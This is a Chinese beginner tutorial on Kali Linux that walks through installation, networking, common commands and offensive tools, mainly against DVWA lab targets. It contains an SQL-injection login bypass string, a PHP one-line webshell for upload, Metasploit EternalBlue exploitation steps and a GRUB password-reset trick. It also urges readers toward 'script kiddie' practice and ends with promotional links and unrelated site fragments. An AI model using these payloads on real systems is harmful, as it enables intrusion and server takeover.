news 2026/5/15 17:41:09

收藏这篇就够了!新手学习 Kali Linux 全指南,避开九成弯路从入门到实战

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
收藏这篇就够了!新手学习 Kali Linux 全指南,避开九成弯路从入门到实战

前言:

当你花了 2 个小时在虚拟机里装好了 Kali Linux—看到屏幕上弹出黑色的终端界面,光标闪烁着 “root@kali:~#” 时,你会不会慌乱?接下来该输什么命令?这些工具怎么用?网上说的 “用 Kali 挖漏洞”,到底从哪下手?

很多人入门黑客第一步就是学Kali,但却连 “终端和 CMD 的区别” 都不知道,只会对着满屏的工具图标乱点:点 Nmap 弹出一堆英文参数,点 Burp Suite 不知道怎么抓包,点 SQLMap 连目标 URL 都不会填。几个小时后关掉虚拟机,开始怀疑:“我是不是没天赋学这个?”

其实,90% 的新手学不会 Kali,不是因为难,是把‘从入门到精通’的路,当成了‘打开软件就会’的事。

今天这篇文章,我会把自己踩过的坑、总结的实战技巧,全部分享给你 —— 新手学 Kali,真的不用怕。

第一:Kali 入门第一步:先解决 “新手最痛的 3 个问题”

新手学 Kali,最容易卡在 “安装、联网、记命令” 这三步。我当初因为不会联网,浪费了 2 天时间;因为记不住命令,差点放弃。其实只要找对方法,这些问题 1 小时就能解决。

1. 安装:别纠结 “双系统”,虚拟机是新手最佳选择

很多新手一开始就想装 “双系统 Kali”,觉得 “这样更专业”,结果分区失误导致电脑数据丢失。其实对新手来说,VMware 虚拟机装 Kali才是最优解:不用改硬盘分区,出问题直接删虚拟机,不影响电脑本身。

新手安装避坑指南:
步骤关键操作常见错误解决方法
下载镜像从 Kali 官网(https://www.kali.org/)下载 “64-bit VMWARE” 镜像下成 “Live 镜像” 或 “其他虚拟机镜像”认准 “VMWARE” 标识,镜像名带 “vmware-amd64”
导入虚拟机打开 VMware,选择 “打开虚拟机”,加载下载的镜像导入后提示 “硬件不兼容”编辑虚拟机设置,将 “兼容性” 改为自己 VMware 版本(如 17.x)
初始登录用户名 “kali”,密码 “kali”(默认账号密码)忘记密码或登录后黑屏重启虚拟机,在 GRUB 界面按 “e”,添加 “init=/bin/bash”,进入单用户模式改密码

我的经验:第一次安装不用改任何配置,默认的 2 核 CPU、4G 内存、20G 硬盘足够新手使用。等后期用熟练了,再根据需要增加内存(比如加到 8G)。

2. 联网:解决 “能连 WiFi 但上不了网” 的新手噩梦

我当初安装后,发现 Kali 能连 WiFi,但打开浏览器却加载不出网页,查了半天才知道是 “DNS 配置问题”。新手联网遇到问题,按这 3 步排查,90% 能解决:

联网问题排查流程:
  1. 检查 IP 地址:打开终端,输入ip a(查看网络接口),看是否有 “inet” 开头的 IP(如 192.168.1.100)。如果没有,说明没获取到 IP,重启网络:sudo systemctl restart NetworkManager

  2. 测试网关连通性:输入ping 192.168.1.1(替换成你家路由器的网关,一般是 192.168.1.1 或 192.168.0.1)。如果 ping 不通,检查虚拟机网络模式(新手选 “NAT 模式”,能直接用主机的网络)。

  3. 配置 DNS:

    如果能 ping 通网关但上不了网,是 DNS 的问题。编辑 DNS 配置文件:

    sudo nano /etc/resolv.conf

    添加两行:

    nameserver 8.8.8.8 # 谷歌DNS nameserver 114.114.114.114 # 国内DNS

    Ctrl+O

    保存,

    Ctrl+X

    退出,再 ping 百度测试:

    ping www.baidu.com

    能收到回复就是联网成功。

3. 记命令:别死记硬背,先掌握 “10 个高频命令”

新手最怕记命令,其实 Kali 常用命令就 10 个,先学会这些,足够应对 80% 的基础操作:

命令作用新手实战场景
ls查看当前目录文件装完工具后,用ls看工具是否在目录里
cd切换目录cd /usr/share/nmap进入 Nmap 工具目录
sudo以管理员权限执行命令改配置文件时,用sudo nano 文件名
apt install 工具名安装工具缺某个工具时,用sudo apt install sqlmap安装
ping 目标IP测试网络连通性扫描前用ping 192.168.1.10看目标是否在线
nmap 目标IP端口扫描nmap 192.168.1.10看目标开放了哪些端口
ifconfig/ip a查看本机 IP连不上靶场时,用ip a看自己的 IP 是否和靶场在同一网段
clear清空终端命令太多看不清时,用clear清屏
cp 源文件 目标路径复制文件把漏洞 POC 复制到桌面:cp /root/poc.py /root/Desktop/
rm 文件名删除文件删除没用的日志:rm /var/log/test.log

记命令技巧:把这 10 个命令写在便利贴上,贴在电脑旁边,用的时候看一眼,3 天就能记住。比如每次打开终端,先输clear清屏,再输ip a查 IP,重复几次就熟了。

第二:新手必学的 5 类 Kali 核心工具:从 “会打开” 到 “能实战”

Kali 里有 300 + 工具,但新手不用全学,先聚焦 “信息收集、漏洞扫描、漏洞利用、Webshell 管理、内网渗透” 这 5 类核心工具,每个工具学 “最常用的 2-3 个功能”,就能满足脚本小子的实战需求。

1. 信息收集工具:搞懂 “目标是谁、开了哪些门”

信息收集是黑客的第一步 —— 不知道目标的 IP、端口、服务,后续就没法挖漏洞。新手重点学Nmap(端口扫描)和OneForAll(子域名收集)。

(1)Nmap:新手必学的 “端口扫描神器”

Nmap 的功能很多,但新手只要会 3 个命令,就能搞定基础扫描:

新手实战任务:用 Nmap 扫描自己的 DVWA 靶场 IP(比如 192.168.1.12),找出开放的 80 端口(Web 服务)和 3306 端口(MySQL 数据库),记录服务版本。

(2)OneForAll:子域名收集 “效率工具”

如果目标是一个网站(比如test.com),光扫主域名不够,还要找子域名(比如admin.test.comblog.test.com),这些子域名往往防护更弱。OneForAll 是 Kali 自带的子域名收集工具,新手只要输 1 条命令:

工具会自动从 20 + 平台(如 DNS 查询、搜索引擎)收集子域名,结果保存在/root/OneForAll/results/目录下,打开 CSV 文件就能看到所有子域名和对应的 IP。

2. 漏洞扫描工具:让 “漏洞自己浮出水面”

新手手动找漏洞效率低,用扫描工具能快速发现目标的基础漏洞。重点学Burp Suite(抓包改包)和Xray(自动化漏洞扫描)。

(1)Burp Suite:Web 漏洞测试 “万能工具”

Burp Suite 是新手必须掌握的工具,核心用 “Proxy(代理)” 和 “Repeater(重放)” 功能,步骤如下:

  1. 配置代理:打开 Burp,在 “Proxy→Intercept” 里点击 “Open Browser”,会弹出一个内置浏览器。
  2. 抓包:用内置浏览器访问 DVWA 靶场的登录页,输入账号密码点击登录,Burp 会拦截到登录请求(Intercept 显示 “Intercepted”)。
  3. 改包测试:把拦截到的请求发送到 Repeater(右键→Send to Repeater),在 Repeater 里修改 “username” 参数(比如把admin改成admin' or 1=1#),点击 “Send”,看响应是否返回管理员信息(测试 SQL 注入漏洞)。

新手实战任务:用 Burp 抓 DVWA 登录请求,修改username参数为admin' or 1=1#,成功登录管理员后台。

(2)Xray:自动化扫描 “懒人神器”

Xray 能自动扫描 Web 漏洞(如 SQL 注入、XSS、文件上传),新手用 “被动扫描” 模式(不主动发请求,只分析 Burp 拦截的流量),步骤:

  1. 启动 Xray 代理:./xray_linux_amd64 webscan --listen 127.0.0.1:8081 --html-output xray-result.html(在 Xray 目录下执行,Kali 默认路径/usr/share/xray/
  2. 配置 Burp 上游代理:在 Burp 的 “Proxy→Options→Upstream Proxy Servers” 里,添加 “127.0.0.1:8081”,让 Burp 把流量转发给 Xray。
  3. 浏览目标:用 Burp 内置浏览器访问 DVWA,点击各个功能模块(如 SQL Injection、XSS),Xray 会自动分析流量,生成漏洞报告(xray-result.html)。
3. 漏洞利用工具:从 “发现漏洞” 到 “拿下目标”

找到漏洞后,需要用工具利用漏洞获取权限。新手重点学SQLMap(SQL 注入利用)和Metasploit(漏洞 exp 利用)。

(1)SQLMap:SQL 注入 “终极工具”

新手不用懂复杂的注入原理,用 SQLMap 能自动利用 SQL 注入漏洞,导出数据库数据。核心命令:

新手实战任务:用 SQLMap 导出 DVWA 的 users 表,获取admin账号的密码(默认加密后的密码是5f4dcc3b5aa765d61d8327deb882cf99,解密后是password)。

(2)Metasploit:漏洞 exp “武器库”

Metasploit 里有 1000 + 漏洞的 exp(漏洞利用代码),新手用它来利用已知漏洞(比如永恒之蓝漏洞)。以利用 Windows 的永恒之蓝漏洞为例:

  1. 启动 Metasploit:msfconsole
  2. 搜索 exp:search ms17-010(ms17-010 是永恒之蓝漏洞的编号)
  3. 加载 exp:use exploit/windows/smb/ms17_010_eternalblue
  4. 设置目标 IP:set RHOSTS 192.168.1.20(目标 Windows 机器的 IP)
  5. 执行攻击:run,成功后会拿到目标的 shell(显示 “Meterpreter session 1 opened”)
4. Webshell 管理工具:“控制目标” 的最后一步

如果通过文件上传漏洞拿到了 Webshell(比如一句话木马),需要用工具连接管理。新手重点学蚁剑(图形化管理,简单直观)。

蚁剑使用步骤:
  1. 准备 Webshell:在 DVWA 的文件上传模块(Low 难度),上传一个 “图片马”(把<?php @eval($_POST['cmd']);?>写入图片文件,改后缀为.php)。
  2. 打开蚁剑:Kali 里搜索 “AntSword”,打开后点击 “添加数据”。
  3. 配置连接:
    • URL:上传的 Webshell 路径(比如http://192.168.1.12/dvwa/hackable/uploads/shell.php
    • 密码:cmd(和 Webshell 里的$_POST['cmd']对应)
  4. 连接:点击 “测试连接”,显示 “连接成功” 后,就能管理目标服务器(比如浏览文件、执行命令)。
5. 内网渗透工具:“突破边界” 的基础工具

如果拿下了目标的边界服务器(比如 Web 服务器),还需要渗透内网。新手重点学Cobalt Strike(简称 CS,内网协作工具),但 CS 需要破解版或授权,新手先学基础的 “内网信息收集” 命令:

第三:成为 “合格脚本小子” 的 3 个关键:避开误区,合法实战

很多新手以为 “会用工具就是脚本小子”,结果要么乱用工具违法,要么只会点几下鼠标,遇到问题就卡壳。其实合格的脚本小子,要满足 3 个条件:会用工具 + 懂基础原理 + 合法实战

1. 误区 1:“只会点工具,不懂原理”—— 永远停留在 “入门”

我当初用 SQLMap 跑通注入后,以为自己 “会黑客技术了”,直到有人问 “为什么输入' or 1=1#能登录”,我答不上来。后来才明白,脚本小子不能只 “知其然”,还要 “知其所以然”。

新手必懂的 3 个基础原理:

学习方法:学完一个工具后,花 10 分钟查 “这个工具利用的漏洞原理是什么”,比如用 SQLMap 后,查 “SQL 注入原理”;用蚁剑后,查 “一句话木马的工作原理”。

2. 误区 2:“乱扫真实网站,触碰法律红线”—— 前途尽毁

我在学 Nmap 时,一时好奇扫描了小区物业的官网,结果第二天收到网警电话,警告我 “未经授权的网络扫描属于违法行为”。新手一定要记住:所有实战必须在合法场景下进行,否则轻则罚款拘留,重则承担刑事责任。

新手合法实战的 3 个渠道:
3. 误区 3:“追求‘高大上’工具,忽视基础操作”

新手总喜欢装各种 “炫酷工具”(比如自动挖洞脚本、破解版 CS),结果连 Nmap 的基础参数都记不住。其实对脚本小子来说,把基础工具用熟,比装 100 个工具更有用

新手工具学习原则:

第四:脚本小子的进阶方向:从 “会用工具” 到 “能解决问题”

成为合格脚本小子后,不要满足于 “点几下工具”,要向 “能独立挖漏洞、解决实际问题” 的方向进阶。我总结了 3 个进阶步骤,帮你为以后成为渗透测试工程师打基础:

1. 第一步:从 “靶场” 到 “SRC”,积累真实漏洞经验

靶场的漏洞都是 “预设好的”,而真实环境的漏洞需要自己找。新手可以从 SRC 平台入手,提交简单的漏洞(如 XSS、信息泄露),步骤:

  1. 选低门槛 SRC:比如补天平台的 “新手专区”,里面的目标防护弱,容易出成果;
  2. 定测试范围:只测试平台列出的 “允许测试域名”,不越界;
  3. 写漏洞报告:包含 “漏洞位置、利用步骤、危害说明、修复建议”,附截图证明(比如 XSS 漏洞,附弹出警告框的截图)。

我第一次在 SRC 提交的是 “某网站登录页的反射型 XSS 漏洞”,虽然只是低危漏洞,但拿到了平台的 “漏洞确认” 邮件,这是我第一次感受到 “用技术创造价值” 的成就感。

2. 第二步:学 “简单编程”,提升工具使用效率

脚本小子不用成为 “程序员”,但要会写简单的脚本,解决重复工作。比如用 Python 写一个 “批量检测 XSS 漏洞” 的脚本,步骤:

  1. 学 Python 基础:重点学requests库(发 HTTP 请求)和re库(正则匹配);
  2. 写脚本逻辑:遍历目标 URL 列表,往参数里插入<script>alert('XSS')</script>,判断响应是否包含插入的脚本;
  3. 测试脚本:用 DVWA 的 XSS 模块测试,看脚本是否能成功检测到漏洞。

推荐学习资源:CSDN 上的《Python 安全编程入门》系列文章,重点看 “HTTP 请求”“正则匹配” 章节,1 周就能上手写简单脚本。

3. 第三步:了解 “安全合规”,避免踩法律坑

进阶后会接触更多真实项目,必须懂 “安全合规”—— 知道哪些能做,哪些不能做。新手重点了解 2 个法规:

结语:新手学 Kali,最需要的不是 “天赋”,是 “耐心”

回望我学 Kali 的 3 个月,从 “对着终端发呆” 到 “用 SQLMap 导出数据库”,从 “不敢实战” 到 “提交 SRC 漏洞”,最大的感悟是:新手学 Kali,没有 “一步登天” 的捷径,只有 “循序渐进” 的踏实

如果你现在打开 Kali 还是会懵,别慌 —— 先学会 “输对第一条命令”,再学会 “用 Nmap 扫第一个端口”,接着学会 “用 SQLMap 跑第一个注入”。每完成一个小目标,你就离 “合格脚本小子” 近一步。

最后提醒你:脚本小子不是 “黑客的终点”,而是 “安全学习的起点”。当你能用工具解决真实问题,能懂漏洞原理,能合法实战时,你就已经超越了 90% 的新手 —— 而这,正是成为渗透测试工程师的基础。

现在,打开你的 Kali 虚拟机,输入第一条命令吧 —— 未来的你,会感谢现在开始行动的自己。

学习资源


如果你也是零基础想转行网络安全,却苦于没系统学习路径、不懂核心攻防技能?光靠盲目摸索不仅浪费时间,还消磨自己信心。这份 360 智榜样学习中心独家出版《网络攻防知识库》专为转行党量身打造!

01内容涵盖

这份资料专门为零基础转行设计,19 大核心模块从 Linux系统、Python 基础、HTTP协议等地基知识到 Web 渗透、代码审计、CTF 实战层层递进,攻防结合的讲解方式让新手轻松上手,真实实战案例 + 落地脚本直接对标企业岗位需求,帮你快速搭建转行核心技能体系!

这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 *(安全链接,放心点击)

02 知识库价值

03 谁需要掌握本知识库

04部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

这份完整版的网络安全学习资料已经上传CSDN【保证100%免费】

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 ***(安全链接,放心点击)**

本文转自网络如有侵权,请联系删除。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/15 17:40:12

AI专著撰写秘籍!一键生成20万字专著,高效写作工具大揭秘!

撰写学术专著不仅是对学术能力的一种考验&#xff0c;还是对心理承受力的极大挑战。与依赖团队合作的论文写作不同&#xff0c;专著的创作往往是“一个人战斗”的过程。从选题、构建框架到具体内容的写作与修改&#xff0c;几乎每一个步骤都需要研究者亲自完成。这样的孤独写作…

作者头像 李华
网站建设 2026/5/15 17:38:04

量子纠错码中串扰噪声的解析与抑制技术

1. 量子纠错码中的串扰噪声本质解析在超导量子处理器和离子阱系统中&#xff0c;串扰噪声&#xff08;Crosstalk Noise&#xff09;表现为量子比特间非预期的耦合效应。这种噪声在表面码&#xff08;Surface Code&#xff09;等拓扑量子纠错方案中尤为致命&#xff0c;因为其会…

作者头像 李华
网站建设 2026/5/15 17:35:07

CircuitPython开发实战:内存管理、文件系统维护与故障排查全指南

1. 项目概述&#xff1a;CircuitPython开发中的“疑难杂症”自救手册 搞嵌入式开发&#xff0c;尤其是用CircuitPython这种对开发者极其友好的环境&#xff0c;最怕的不是代码逻辑写不出来&#xff0c;而是设备突然“闹脾气”。你正兴致勃勃地调试一个传感器项目&#xff0c;结…

作者头像 李华